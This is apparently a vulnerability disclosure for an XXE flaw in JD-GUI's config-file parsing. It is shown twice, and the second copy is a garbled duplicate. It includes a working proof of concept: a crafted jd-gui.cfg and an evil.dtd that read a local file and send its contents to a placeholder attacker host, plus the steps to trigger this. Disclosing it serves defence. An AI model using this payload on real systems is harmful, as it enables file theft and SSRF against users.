This is not a critical security issue in my opinion as it is quite a contrived scenario. Just observed the behaviour and wanted to have it out of my mind.
Due to the way the jd-gui.cfg file is parsed allows for SSRF or File Disclosure attacks due to processing of XML external entities.
The main issues are:
When parsing jd-gui.cfg files it follows external entities
Current working dir is used on $nix based systems
Attack idea
Place a jd-gui.cfg file within the file locations of .jars to trigger the vulnerability.
Attack Setup
Follow the outlined steps within the same dir:
echo -n testcontent>test # file to be extracted
Create the following jd-gui.cfg file:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM
"file:///<path/to/current_working_dir>/test">
<!ENTITY % dtd SYSTEM
"http://<attacker-host>:8000/evil.dtd">
%dtd;
]>
<data>&send;</data>
Replace the value <attacker-host> with your attacking host. Also replace the <path/to/current_working_dir> with your CWD
Create the evil.dtd file:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://<attacker-host>:8000/?collect=%file;'>">
%all;
Replace the value <attacker-host> again to match your host machine
Start python Webserver python3 -m http.server
Last step, start jd-gui.jar e.g. java -jar ~/Downloads/jd-gui.jar 8.
XXE leads to SSRF/File Disclosure
This is not a critical security issue in my opinion as it is quite a contrived scenario. Just observed the behaviour and wanted to have it out of my mind.
Due to the way the
jd-gui.cfg
file is parsed allows for SSRF or File Disclosure attacks due to processing of XML external entities. The main issues are:jd-gui.cfg
files it follows external entitiesAttack idea
Place a
jd-gui.cfg
file within the file locations of.jar
s to trigger the vulnerability.Attack Setup
Follow the outlined steps within the same dir:
echo -n testcontent>test
# file to be extractedjd-gui.cfg
file:<attacker-host>
with your attacking host. Also replace the<path/to/current_working_dir>
with your CWDevil.dtd
file:<attacker-host>
again to match your host machinepython3 -m http.server
java -jar ~/Downloads/jd-gui.jar
8.Result:
Some Notes:
Recommendations